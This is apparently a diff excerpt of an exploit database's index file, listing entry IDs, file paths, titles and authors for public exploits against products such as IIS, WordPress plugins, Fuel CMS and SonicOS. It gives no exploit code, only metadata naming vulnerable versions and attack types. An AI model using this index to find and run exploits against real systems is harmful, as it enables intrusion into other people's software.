1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
@ -44575,3 +44576,19 @@ id,file,description,date,author,type,platform,port
50469,exploits/multiple/webapps/50469.rb,"Ericsson Network Location MPS GMPC21 - Privilege Escalation (Metasploit)",1970-01-01,AkkuS,webapps,multiple,
50473,exploits/multiple/webapps/50473.txt,"i3 International Annexxus Cameras Ax-n 5.2.0 - Application Logic Flaw",1970-01-01,LiquidWorm,webapps,multiple,
50474,exploits/multiple/webapps/50474.txt,"Codiad 2.8.4 - Remote Code Execution (Authenticated) (4)",1970-01-01,P4p4_M4n3,webapps,multiple,
50475,exploits/php/webapps/50475.txt,"PHPJabbers Simple CMS 5 - 'name' Persistent Cross-Site Scripting (XSS)",1970-01-01,Vulnerability-Lab,webapps,php,
50476,exploits/php/webapps/50476.txt,"WordPress Plugin Hotel Listing 3 - 'Multiple' Cross-Site Scripting (XSS)",1970-01-01,Vulnerability-Lab,webapps,php,
50477,exploits/php/webapps/50477.py,"Fuel CMS 1.4.1 - Remote Code Execution (3)",1970-01-01,"Padsala Trushal",webapps,php,
50478,exploits/java/webapps/50478.txt,"Eclipse Jetty 11.0.5 - Sensitive File Disclosure",1970-01-01,"Mayank Deshmukh",webapps,java,
50479,exploits/php/webapps/50479.txt,"WordPress Plugin Popup Anything 2.0.3 - 'Multiple' Stored Cross-Site Scripting (XSS)",1970-01-01,"Luca Schembri",webapps,php,
50480,exploits/java/webapps/50480.go,"OpenAM 13.0 - LDAP Injection",1970-01-01,"Charlton Trezevant",webapps,java,
50482,exploits/php/webapps/50482.txt,"Simplephpscripts Simple CMS 2.1 - 'Multiple' Stored Cross-Site Scripting (XSS)",1970-01-01,Vulnerability-Lab,webapps,php,
50483,exploits/php/webapps/50483.txt,"Simplephpscripts Simple CMS 2.1 - 'Multiple' SQL Injection",1970-01-01,Vulnerability-Lab,webapps,php,
50485,exploits/hardware/webapps/50485.txt,"Sonicwall SonicOS 6.5.4 - 'Common Name' Cross-Site Scripting (XSS)",1970-01-01,Vulnerability-Lab,webapps,hardware,
50486,exploits/php/webapps/50486.txt,"PHP Melody 3.0 - 'Multiple' Cross-Site Scripting (XSS)",1970-01-01,Vulnerability-Lab,webapps,php,
50487,exploits/php/webapps/50487.txt,"PHP Melody 3.0 - 'vid' SQL Injection",1970-01-01,Vulnerability-Lab,webapps,php,
50489,exploits/php/webapps/50489.txt,"Mult-e-Cart Ultimate 2.4 - 'id' SQL Injection",1970-01-01,Vulnerability-Lab,webapps,php,
50488,exploits/php/webapps/50488.txt,"PHP Melody 3.0 - Persistent Cross-Site Scripting (XSS)",1970-01-01,Vulnerability-Lab,webapps,php,
50490,exploits/multiple/webapps/50490.txt,"Isshue Shopping Cart 3.5 - 'Title' Cross Site Scripting (XSS)",1970-01-01,Vulnerability-Lab,webapps,multiple,
50491,exploits/php/webapps/50491.txt,"Vanguard 2.1 - 'Search' Cross-Site Scripting (XSS)",1970-01-01,Vulnerability-Lab,webapps,php,
50492,exploits/php/webapps/50492.txt,"Ultimate POS 4.4 - 'name' Cross-Site Scripting (XSS)",1970-01-01,Vulnerability-Lab,webapps,php,

Can't render this file because it is too large.